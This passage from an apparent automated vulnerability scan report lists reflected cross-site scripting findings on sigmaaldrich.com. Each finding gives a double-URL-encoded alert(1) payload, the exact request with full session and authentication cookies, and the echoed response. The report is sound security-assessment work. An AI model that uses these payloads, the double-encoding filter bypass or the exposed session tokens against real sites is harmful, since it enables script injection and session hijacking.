Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:35 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science2eb75";alert(1)//874a57ef240/learning-center.html","E404") ;
   </script>
...[SNIP]...

1.554. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/learning-center.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fffa9%2522%253balert%25281%2529%252f%252f3d3b109cc80 was submitted in the REST URL parameter 2. This input was echoed as fffa9";alert(1)//3d3b109cc80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/fffa9%2522%253balert%25281%2529%252f%252f3d3b109cc80 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:37 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/fffa9";alert(1)//3d3b109cc80","E404") ;
   </script>
...[SNIP]...

1.555. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd40a%2522%253balert%25281%2529%252f%252f1c12647a62d was submitted in the REST URL parameter 1. This input was echoed as bd40a";alert(1)//1c12647a62d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencebd40a%2522%253balert%25281%2529%252f%252f1c12647a62d/life-science-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencebd40a";alert(1)//1c12647a62d/life-science-catalog.html","E404") ;
   </script>
...[SNIP]...

1.556. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69a97%2522%253balert%25281%2529%252f%252f6cf6b7c39ad was submitted in the REST URL parameter 2. This input was echoed as 69a97";alert(1)//6cf6b7c39ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/69a97%2522%253balert%25281%2529%252f%252f6cf6b7c39ad HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/69a97";alert(1)//6cf6b7c39ad","E404") ;
   </script>
...[SNIP]...

1.557. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e526f%2522%253balert%25281%2529%252f%252f2541cf96a68 was submitted in the REST URL parameter 1. This input was echoed as e526f";alert(1)//2541cf96a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencee526f%2522%253balert%25281%2529%252f%252f2541cf96a68/life-science-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:37 GMT
Content-Length: 28944
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencee526f";alert(1)//2541cf96a68/life-science-services.html","E404") ;
   </script>
...[SNIP]...

1.558. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cea8%2522%253balert%25281%2529%252f%252f337f97a7b4c was submitted in the REST URL parameter 2. This input was echoed as 6cea8";alert(1)//337f97a7b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/6cea8%2522%253balert%25281%2529%252f%252f337f97a7b4c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; 